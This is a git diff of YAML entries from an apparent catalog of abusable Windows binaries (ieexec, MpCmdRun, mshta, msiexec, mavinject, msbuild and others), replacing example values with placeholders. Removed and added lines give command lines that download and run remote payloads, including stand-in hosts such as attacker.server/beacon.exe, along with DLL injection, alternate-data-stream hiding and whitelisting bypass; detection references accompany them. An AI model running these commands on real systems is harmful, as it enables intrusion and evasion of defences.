a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml index 80c6cc5..0e28545 100644 --- a/yml/OSBinaries/Ie4uinit.yml +++ b/yml/OSBinaries/Ie4uinit.yml @@ -1,7 +1,7 @@ --- Name: Ie4uinit.exe Description: Executes commands from a specially prepared ie4uinit.inf file. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: ie4uinit.exe -BaseSettings @@ -18,8 +18,6 @@ Full_Path: - Path: c:\windows\sysWOW64\ie4uinit.exe - Path: c:\windows\system32\ieuinit.inf - Path: c:\windows\sysWOW64\ieuinit.inf -Code_Sample: - - Code: Detection: - IOC: ie4uinit.exe copied outside of %windir% - IOC: ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir% diff --git a/yml/OSBinaries/Iediagcmd.yml b/yml/OSBinaries/Iediagcmd.yml index 056e30e..52ea092 100644 --- a/yml/OSBinaries/Iediagcmd.yml +++ b/yml/OSBinaries/Iediagcmd.yml @@ -4,7 +4,7 @@ Description: Diagnostics Utility for Internet Explorer Author: manasmbellani Created: 2022-03-29 Commands: - - Command: 'set windir=c:\test& cd "C:\Program Files\Internet Explorer\" & iediagcmd.exe /out:c:\test\foo.cab' + - Command: 'set windir=c:\test& cd "C:\Program Files\Internet Explorer\" & iediagcmd.exe /out:{PATH_ABSOLUTE:.cab}' Description: Executes binary that is pre-planted at C:\test\system32\netsh.exe. Usecase: Spawn a pre-planted executable from iediagcmd.exe. Category: Execute diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index f397b37..fefe0e4 100644 --- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml @@ -1,11 +1,11 @@ --- Name: Ieexec.exe Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe - Description: Downloads and executes bypass.exe from the remote server. + - Command: ieexec.exe {REMOTEURL:.exe} + Description: Downloads and executes executable from the remote server. Usecase: Download and run attacker code from remote location Category: Download Privileges: User @@ -14,8 +14,8 @@ Commands: Tags: - Execute: Remote - Execute: EXE (.NET) - - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe - Description: Downloads and executes bypass.exe from the remote server. + - Command: ieexec.exe {REMOTEURL:.exe} + Description: Downloads and executes executable from the remote server. Usecase: Download and run attacker code from remote location Category: Execute Privileges: User @@ -27,8 +27,6 @@ Commands: Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml diff --git a/yml/OSBinaries/Ilasm.yml b/yml/OSBinaries/Ilasm.yml index af0ddcd..cf9b79f 100644 --- a/yml/OSBinaries/Ilasm.yml +++ b/yml/OSBinaries/Ilasm.yml @@ -4,14 +4,14 @@ Description: used for compile c# code into dll or exe. Author: Hai vaknin (lux) Created: 2020-03-17 Commands: - - Command: ilasm.exe C:\public\test.txt /exe + - Command: ilasm.exe {PATH_ABSOLUTE:.txt} /exe Description: Binary file used by .NET to compile C#/intermediate (IL) code to .exe Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 - - Command: ilasm.exe C:\public\test.txt /dll + - Command: ilasm.exe {PATH_ABSOLUTE:.txt} /dll Description: Binary file used by .NET to compile C#/intermediate (IL) code to dll Usecase: A description of the usecase Category: Compile @@ -21,8 +21,6 @@ Commands: Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe -Code_Sample: - - Code: Detection: - IOC: Ilasm may not be used often in production environments (such as on endpoints) - Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml @@ -32,4 +30,3 @@ Acknowledgement: - Person: Hai Vaknin(Lux) Handle: '@VakninHai' - Person: Lior Adar - Handle: diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index d0f129a..0f3b379 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -1,10 +1,10 @@ --- Name: Infdefaultinstall.exe Description: Binary used to perform installation based on content inside inf files -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: InfDefaultInstall.exe Infdefaultinstall.inf + - Command: InfDefaultInstall.exe {PATH:.inf} Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. Usecase: Code execution Category: Execute diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index c9f29fe..f14239a 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -4,7 +4,7 @@ Description: The Installer tool is a command-line utility that allows you to ins Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + - Command: InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll} Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting Category: AWL Bypass @@ -14,7 +14,7 @@ Commands: Tags: - Execute: DLL (.NET) - Execute: EXE (.NET) - - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + - Command: InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll} Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting Category: Execute @@ -24,7 +24,7 @@ Commands: Tags: - Execute: DLL (.NET) - Execute: EXE (.NET) - - Command: InstallUtil.exe https://example.com/payload + - Command: InstallUtil.exe {REMOTEURL} Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server Category: Download diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml index 3a5f5a6..a0b3e49 100644 --- a/yml/OSBinaries/Jsc.yml +++ b/yml/OSBinaries/Jsc.yml @@ -1,11 +1,11 @@ --- Name: Jsc.exe Description: Binary file used by .NET to compile JavaScript code to .exe or .dll format -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2019-05-31 Commands: - - Command: jsc.exe scriptfile.js - Description: Use jsc.exe to compile JavaScript code stored in scriptfile.js and output scriptfile.exe. + - Command: jsc.exe {PATH:.js} + Description: Use jsc.exe to compile JavaScript code stored in the provided .JS file and generate a .EXE file with the same name. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User @@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: JScript - - Command: jsc.exe /t:library Library.js - Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll. + - Command: jsc.exe /t:library {PATH:.js} + Description: Use jsc.exe to compile JavaScript code stored in the .JS file and generate a DLL file with the same name. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User @@ -27,8 +27,6 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml - IOC: Jsc.exe should normally not run a system unless it is used for development. diff --git a/yml/OSBinaries/Ldifde.yml b/yml/OSBinaries/Ldifde.yml index 9cc707d..cb31bf5 100644 --- a/yml/OSBinaries/Ldifde.yml +++ b/yml/OSBinaries/Ldifde.yml @@ -1,11 +1,11 @@ --- Name: Ldifde.exe Description: Creates, modifies, and deletes LDAP directory objects. -Author: 'Grzegorz Tworek' +Author: Grzegorz Tworek Created: 2022-08-31 Commands: - - Command: Ldifde -i -f inputfile.ldf - Description: Import inputfile.ldf into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder. + - Command: Ldifde -i -f {PATH:.ldf} + Description: Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder. Usecase: Download file from Internet Category: Download Privileges: Administrator diff --git a/yml/OSBinaries/Makecab.yml b/yml/OSBinaries/Makecab.yml index 9dfec80..c0f6208 100644 --- a/yml/OSBinaries/Makecab.yml +++ b/yml/OSBinaries/Makecab.yml @@ -4,7 +4,7 @@ Description: Binary to package existing files into a cabinet (.cab) file Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab + - Command: makecab {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:autoruns.cab Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. Usecase: Hide data compressed into an alternate data stream Category: ADS @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Type: Compression - - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab + - Command: makecab {PATH_SMB:.exe} {PATH_ABSOLUTE}:file.cab Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. Usecase: Hide data compressed into an alternate data stream Category: ADS @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Type: Compression - - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab + - Command: makecab {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab} Description: Download and compresses the target file and stores it in the target file. Usecase: Download file and compress into a cab file Category: Download @@ -31,7 +31,7 @@ Commands: OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Type: Compression - - Command: makecab /F directives.ddf + - Command: makecab /F {PATH:.ddf} Description: Execute makecab commands as defined in the specified Diamond Definition File (.ddf); see resources for the format specification. Usecase: Bypass command-line based detections Category: Execute diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index 33e2aa7..5606b70 100644 --- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml @@ -1,10 +1,10 @@ --- Name: Mavinject.exe Description: Used by App-v in Windows -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll + - Command: MavInject.exe 3110 /INJECTRUNNING {PATH_ABSOLUTE:.dll} Description: Inject evil.dll into a process with PID 3110. Usecase: Inject dll file into running process Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" + - Command: Mavinject.exe 4172 /INJECTRUNNING {PATH_ABSOLUTE}:file.dll Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 Usecase: Inject dll file into running process Category: ADS diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index cd12895..75539d3 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml @@ -1,11 +1,11 @@ --- Name: Microsoft.Workflow.Compiler.exe Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code. -Author: 'Conor Richard' +Author: Conor Richard Created: 2018-10-22 Commands: - - Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml - Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file. + - Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log} + Description: Compile and execute C# or VB.net code in a XOML file referenced in the first argument (any extension accepted). Usecase: Compile and run code Category: Execute Privileges: User @@ -14,7 +14,7 @@ Commands: Tags: - Execute: VB.Net - Execute: Csharp - - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt + - Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log} Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code Category: Execute @@ -23,7 +23,7 @@ Commands: OperatingSystem: Windows 10S, Windows 11 Tags: - Execute: XOML - - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt + - Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log} Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code Category: AWL Bypass @@ -34,8 +34,6 @@ Commands: - Execute: XOML Full_Path: - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml - Splunk: https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index dab5e49..44eefd4 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml @@ -4,7 +4,7 @@ Description: Load snap-ins to locally and remotely manage Windows systems Author: '@bohops' Created: 2018-12-04 Commands: - - Command: mmc.exe -Embedding c:\path\to\test.msc + - Command: mmc.exe -Embedding {PATH_ABSOLUTE:.msc} Description: Launch a 'backgrounded' MMC process and invoke a COM payload Usecase: Configure a snap-in to load a COM custom class (CLSID) that has been added to the registry Category: Execute @@ -25,8 +25,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\mmc.exe - Path: C:\Windows\SysWOW64\mmc.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml index de2efaa..62e0de7 100644 --- a/yml/OSBinaries/MpCmdRun.yml +++ b/yml/OSBinaries/MpCmdRun.yml @@ -1,26 +1,26 @@ --- Name: MpCmdRun.exe Description: Binary part of Windows Defender. Used to manage settings in Windows Defender -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2020-03-20 Commands: - - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe + - Command: MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe} Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) Usecase: Download file Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10 - - Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe + - Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url {REMOTEURL:.exe} -path C:\Users\Public\Downloads\evil.exe Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation] Usecase: Download file Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10 - - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\temp\nicefile.txt:evil.exe + - Command: MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}:evil.exe Description: Download file to machine and store it in Alternate Data Stream - Usecase: Hide downloaded data inton an Alternate Data Stream + Usecase: Hide downloaded data into an Alternate Data Stream Category: ADS Privileges: User MitreID: T1564.004 @@ -32,8 +32,6 @@ Full_Path: - Path: C:\Program Files\Windows Defender\MpCmdRun.exe - Path: C:\Program Files (x86)\Windows Defender\MpCmdRun.exe - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23110.3-0\X86\MpCmdRun.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml - Elastic: https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml @@ -53,6 +51,5 @@ Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' - Person: RichRumble - Handle: '' - Person: Cedric Handle: '@th3c3dr1c' diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index 04ff916..a145cb8 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -1,10 +1,10 @@ --- Name: Msbuild.exe Description: Used to compile and execute code -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: msbuild.exe pshell.xml + - Command: msbuild.exe {PATH:.xml} Description: Build and execute a C# project stored in the target XML file. Usecase: Compile and run code Category: AWL Bypass @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CSharp - - Command: msbuild.exe project.csproj + - Command: msbuild.exe {PATH:.csproj} Description: Build and execute a C# project stored in the target csproj file. Usecase: Compile and run code Category: Execute @@ -22,8 +22,8 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CSharp - - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo - Description: Executes generated Logger DLL file with TargetLogger export + - Command: msbuild.exe /logger:TargetLogger,{PATH_ABSOLUTE:.dll};MyParameters,Foo + Description: Executes generated Logger DLL file with TargetLogger export. Usecase: Execute DLL Category: Execute Privileges: User @@ -31,8 +31,8 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Command: msbuild.exe project.proj - Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. + - Command: msbuild.exe {PATH:.proj} + Description: Execute JScript/VBScript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. Usecase: Execute project file that contains XslTransformation tag parameters Category: Execute Privileges: User @@ -40,7 +40,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: XSL - - Command: msbuild.exe @sample.rsp + - Command: msbuild.exe @{PATH:.rsp} Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. Usecase: Bypass command-line based detections Category: Execute @@ -57,8 +57,6 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe - Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml diff --git a/yml/OSBinaries/Msconfig.yml b/yml/OSBinaries/Msconfig.yml index f8c829e..aff184e 100644 --- a/yml/OSBinaries/Msconfig.yml +++ b/yml/OSBinaries/Msconfig.yml @@ -1,7 +1,7 @@ --- Name: Msconfig.exe Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Msconfig.exe -5 diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index e681104..28eef54 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml @@ -1,11 +1,11 @@ --- Name: Msdt.exe Description: Microsoft diagnostics tool -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE - Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. + - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE + Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the .xml file. Usecase: Execute code Category: Execute Privileges: User @@ -14,8 +14,8 @@ Commands: Tags: - Application: GUI - Execute: MSI - - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE - Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. + - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE + Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the .xml file. Usecase: Execute code bypass Application whitelisting Category: AWL Bypass Privileges: User diff --git a/yml/OSBinaries/Msedge.yml b/yml/OSBinaries/Msedge.yml index d0cc16d..de9d6a7 100644 --- a/yml/OSBinaries/Msedge.yml +++ b/yml/OSBinaries/Msedge.yml @@ -4,22 +4,22 @@ Description: Microsoft Edge browser Author: mr.d0x Created: 2022-01-20 Commands: - - Command: msedge.exe https://example.com/file.exe.txt - Description: Edge will launch and download the file. A harmless file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen. + - Command: msedge.exe {REMOTEURL:.exe.txt} + Description: Edge will launch and download the file. A 'harmless' file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen. Usecase: Download file from the internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: msedge.exe --headless --enable-logging --disable-gpu --dump-dom "http://example.com/evil.b64.html" > out.b64 + - Command: msedge.exe --headless --enable-logging --disable-gpu --dump-dom "{REMOTEURL:.base64.html}" > {PATH:.b64} Description: Edge will silently download the file. File extension should be .html and binaries should be encoded. Usecase: Download file from the internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: msedge.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" - Description: Edge spawns cmd.exe as a child process of msedge.exe and executes the ping command + - Command: msedge.exe --disable-gpu-sandbox --gpu-launcher="{CMD} &&" + Description: Edge spawns cmd.exe as a child process of msedge.exe and executes the specified command Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute Privileges: User diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index eb8167d..ed750fb 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -4,7 +4,7 @@ Description: Used by Windows to execute html applications. (.hta) Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: mshta.exe evilfile.hta + - Command: mshta.exe {PATH:.hta} Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. Usecase: Execute code Category: Execute @@ -14,7 +14,7 @@ Commands: Tags: - Execute: HTA - Execute: Remote - - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) + - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:{REMOTEURL:.sct}"")")) Description: Executes VBScript supplied as a command line argument. Usecase: Execute code Category: Execute @@ -23,7 +23,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: VBScript - - Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close(); + - Command: mshta.exe javascript:a=GetObject("script:{REMOTEURL:.sct}").Exec();close(); Description: Executes JavaScript supplied as a command line argument. Usecase: Execute code Category: Execute @@ -32,7 +32,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: JScript - - Command: mshta.exe "C:\ads\file.txt:file.hta" + - Command: mshta.exe "{PATH_ABSOLUTE}:file.hta" Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. Usecase: Execute code hidden in alternate data stream Category: ADS @@ -41,7 +41,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer) Tags: - Execute: HTA - - Command: mshta.exe https://example.com/payload + - Command: mshta.exe {REMOTEURL} Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server Category: Download diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index 7de2d33..a57b9a6 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -1,10 +1,10 @@ --- Name: Msiexec.exe Description: Used by Windows to execute msi files -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: msiexec /quiet /i cmd.msi + - Command: msiexec /quiet /i {PATH:.msi} Description: Installs the target .MSI file silently. Usecase: Execute custom made msi file with attack code Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: MSI - - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png + - Command: msiexec /q /i {REMOTEURL} Description: Installs the target remote & renamed .MSI file silently. Usecase: Execute custom made msi file with attack code from remote server Category: Execute @@ -23,7 +23,7 @@ Commands: Tags: - Execute: MSI - Execute: Remote - - Command: msiexec /y "C:\folder\evil.dll" + - Command: msiexec /y {PATH_ABSOLUTE:.dll} Description: Calls DllRegisterServer to register the target DLL. Usecase: Execute dll files Category: Execute @@ -33,7 +33,7 @@ Commands: Tags: - Execute: DLL - Execute: Remote - - Command: msiexec /z "C:\folder\evil.dll" + - Command: msiexec /z {PATH_ABSOLUTE:.dll} Description: Calls DllUnregisterServer to un-register the target DLL. Usecase: Execute dll files Category: Execute @@ -43,7 +43,7 @@ Commands: Tags: - Execute: DLL - Execute: Remote - - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb + - Command: msiexec /i {PATH_ABSOLUTE:.msi} TRANSFORMS="{REMOTEURL:.mst}" /qb Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input. Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server Category: Execute diff --git a/yml/OSBinaries/Netsh.yml b/yml/OSBinaries/Netsh.yml index 0689edd..8238aec 100644 --- a/yml/OSBinaries/Netsh.yml +++ b/yml/OSBinaries/Netsh.yml @@ -1,10 +1,10 @@ --- Name: Netsh.exe Description: Netsh is a Windows tool used to manipulate network interface settings. -Author: 'Freddie Barr-Smith' +Author: Freddie Barr-Smith Created: 2019-12-24 Commands: - - Command: netsh.exe add helper C:\Users\User\file.dll + - Command: netsh.exe add helper {PATH_ABSOLUTE:.dll} Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called Usecase: Proxy execution of .dll Category: Execute diff --git a/yml/OSBinaries/Ngen.yml b/yml/OSBinaries/Ngen.yml index 82b1870..d9e18d9 100644 --- a/yml/OSBinaries/Ngen.yml +++ b/yml/OSBinaries/Ngen.yml @@ -4,7 +4,7 @@ Description: Microsoft Native Image Generator. Author: Avihay Eldad Created: 2024-02-19 Commands: - - Command: ngen.exe http://example.com/calc.exe + - Command: ngen.exe {REMOTEURL} Description: Downloads payload from remote server using the Microsoft Native Image Generator utility. Usecase: It will download a remote payload and place it in INetCache. Category: Download diff --git a/yml/OSBinaries/Odbcconf.yml b/yml/OSBinaries/Odbcconf.yml index 97d3aa4..74c88ac 100644 --- a/yml/OSBinaries/Odbcconf.yml +++ b/yml/OSBinaries/Odbcconf.yml @@ -1,12 +1,12 @@ --- Name: Odbcconf.exe 